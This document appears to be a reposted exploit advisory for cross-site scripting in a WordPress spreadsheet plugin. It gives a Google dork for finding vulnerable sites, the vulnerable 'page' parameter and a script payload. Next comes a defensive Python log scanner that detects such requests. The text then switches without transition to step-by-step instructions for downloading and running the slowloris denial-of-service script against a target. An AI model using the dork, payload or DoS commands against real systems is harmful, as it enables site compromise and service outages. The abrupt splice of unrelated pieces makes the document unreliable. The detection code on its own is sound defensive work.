WordPress Spreadsheet Plugin Cross-Site Scripting
#********************************************************************************
# Exploit Title : WordPress Spreadsheet Plugin Cross-Site Scripting
#
# Exploit Author : Ashiyane Digital Security Team
#
# Vendor Homepage : http://wordpress.org
#
# Software Link : http://downloads.wordpress.org/plugin/dh...et.2.0.zip
#
# Google Dork : inurl :wp-content/plugins/dhtmlxspreadsheet
#
# Tested on: Windows 7 , Linux
-------------------------------------------------------------------
# Exploit : Cross-site scripting
#
# Location : [Target]/wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=[xss]
#
# Script For Test : <script>alert(1);</script>
######################
# Example:
#
#
http://www.vulnsite.com/wp-content/plugi...(1);</script>
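
For defenders, requests that place markup in the page parameter of this endpoint can be found in web server access logs. The following is an added example, not part of the original advisory or the plugin's code; it assumes combined-format logs, the markup heuristic is an assumption, and the sample lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint and parameter name come from the advisory's "Location" line.
PLUGIN_PATH = "/wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php"
PARAM = "page"
# Request field of a combined-format access log: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumed heuristic: these never belong in a legitimate page value.
MARKUP_RE = re.compile(r"[<>\"'`]|javascript:", re.IGNORECASE)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET ' + PLUGIN_PATH
    + '?page=%3Cscript%3Ealert(1)%3B%3C/script%3E HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET ' + PLUGIN_PATH
    + '?page=2 HTTP/1.1" 200 498',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /blog' + PLUGIN_PATH
    + '?page=%253Cscript%253E HTTP/1.1" 200 503',
    '198.51.100.7 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php'
    '?page=%3Cb%3E HTTP/1.1" 200 120',
]

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (%253C -> %3C -> <), bounded."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_page_value(log_line):
    """Decoded 'page' value if the request hits the plugin endpoint
    with markup in that parameter, otherwise None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    # endswith() also covers WordPress installed in a subdirectory.
    if not unquote(target.path).lower().endswith(PLUGIN_PATH):
        return None
    for raw in parse_qs(target.query, keep_blank_values=True).get(PARAM, []):
        value = fully_decode(raw)
        if MARKUP_RE.search(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every suspicious request."""
    hits = [(n, suspicious_page_value(l)) for n, l in enumerate(lines, start=1)]
    return [(n, v) for n, v in hits if v is not None]
```

A hit shows only that the request was made; whether the payload was reflected unencoded depends on the installed plugin version.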
Save this file as "slowloris.pl". Script download: http://pastebin.com/2M4ZAHpz
Open the terminal and run the following commands:
cd Desktop (replace the location with wherever the file is; in this case it is on the Desktop)
chmod +x slowloris.pl
perl ./slowloris.pl -dns www.target.com -port 80 -timeout 1 -num 1000 -cache
1- Replace the URL with the target's address.
2- In this case, 1000 packets will be sent every 1 second.